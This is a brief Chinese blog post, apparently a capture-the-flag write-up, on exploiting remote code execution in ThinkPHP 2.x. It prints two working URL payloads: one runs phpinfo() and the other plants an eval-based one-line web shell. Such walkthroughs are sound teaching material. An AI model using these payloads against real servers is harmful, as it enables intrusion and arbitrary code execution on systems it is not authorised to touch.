[ThinkPHP]2-Rce 1

[ThinkPHP]2-Rce 1

启动实例发现是一个ThinkPHP的示例代码,根据题目判断这题为RCE

image-20241105081322688

扫描器扫描,未发现存在的REC漏洞(根据题目以及扫描结果猜想,可能是2.x版本的rec)

image-20241105081525696

构造payload,成功显示phpinfo页面

?s=/index/index/name/${phpinfo()}

image-20241105082201274

唱跳rap篮球+F,直接找到flag

image-20241105082253527

tips.有时候在phpinfo找不到,可以采用一句话木马形式

?s=/index/index/name/${@eval($_POST[123456])}

image-20241105082540574

posted @ 2024-11-09 23:13  TazmiDev  阅读(108)  评论(0)    收藏  举报